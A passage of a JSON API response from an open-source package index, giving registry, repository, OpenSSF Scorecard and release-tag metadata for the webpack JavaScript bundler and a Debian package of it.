1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@duplotech%2Fwebpack/codemeta","maintainers":[{"uuid":"sebinsua","login":"sebinsua","name":null,"email":"me@sebinsua.com","url":null,"packages_count":57,"html_url":"https://www.npmjs.com/~sebinsua","role":null,"created_at":"2022-11-17T02:03:50.001Z","updated_at":"2022-11-17T02:03:50.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sebinsua/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13660451,"name":"node-webpack","ecosystem":"debian","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T08:39:30.245Z","latest_release_published_at":"2026-02-12T08:39:30.245Z","latest_release_number":"5.97.1+dfsg1+~cs11.18.27-3","last_synced_at":"2026-03-14T08:04:23.833Z","created_at":"2026-02-12T08:39:30.038Z","updated_at":"2026-08-29T01:17:03.718Z","registry_url":"https://tracker.debian.org/pkg/node-webpack","install_command":"apt-get install node-webpack","documentation_url":"https://packages.debian.org/trixie/node-webpack","metadata":{"component":"main","architecture":"all","priority":"extra","binary":"webpack","standards_version":"4.7.0","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-nodejs, dh-sequence-nodejs, jest (\u003e= 29) \u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-envinfo, node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-jest-diff \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-memfs \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-strip-ansi \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c